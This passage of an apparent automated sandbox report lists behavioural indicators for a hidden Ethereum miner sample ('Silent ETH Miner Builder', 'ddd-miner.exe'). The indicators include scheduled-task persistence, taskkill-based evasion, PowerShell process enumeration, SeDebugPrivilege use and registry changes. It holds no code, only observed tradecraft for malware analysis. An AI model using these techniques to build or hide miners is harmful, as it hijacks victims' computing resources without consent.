Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133865464186428444" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616257" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\system32\BackgroundTransferHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\BackgroundTransferHost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\0\MRUListEx = ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 19002f433a5c000000000000000000000000000000000000000000 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 = 50003100000000006d5a028b100041646d696e003c0009000400efbe6d5a76846f5a4da72e00000021570200000001000000000000000000000000000000c9a0bf00410064006d0069006e00000014000000 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000001000000ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\system32\BackgroundTransferHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 = 50003100000000006d5aa38610004c6f63616c003c0009000400efbe6d5a76846f5a4da72e00000040570200000001000000000000000000000000000000727b8d004c006f00630061006c00000014000000 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\0 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202020202 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0\0 = 60003100000000006f5a4fa71000375a4f3435347e320000480009000400efbe6f5a4fa76f5a4fa72e00000040b2020000001a000000000000000000000000000000493c2f0137007a004f0034003500340043003400390039003800000018000000 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\Children C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\0 = 4e003100000000006f5a4fa7100054656d7000003a0009000400efbe6d5a76846f5a4fa72e00000041570200000001000000000000000000000000000000493c2f01540065006d007000000014000000 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0100000000000000ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Key created \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 0000000001000000ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0000000007000000060000000500000004000000020000000300000001000000ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\MRUListEx = 00000000ffffffff C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-620072444-2846605723-1118207114-1642104096-81213792-2370344205-2712285428\DisplayName = "Chrome Sandbox" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-167299615-4170584903-1843289874-1000\{6E742B4A-2A0C-44B9-B4F1-C19D2A5F5D52} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-167299615-4170584903-1843289874-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 = 78003100000000006d5a76841100557365727300640009000400efbec5522d606f5a4da72e0000006c0500000000010000000000000000003a00000000003e5e3d0055007300650072007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100380031003300000014000000 C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\TaskManager Installer (2).exe:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened for modification C:\Users\Admin\Downloads\TaskManager Installer.exe:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Users\Admin\Downloads\TaskManager Installer (1).exe:Zone.Identifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\ddd-miner.exe N/A
N/A N/A C:\Users\Admin\Downloads\ddd-miner.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Downloads\ddd-miner.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Downloads\ddd-miner.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO454C4998\Silent ETH Miner Builder.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zFM.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\ddd-miner.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\ddd-miner.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\ddd-miner.exe N/A
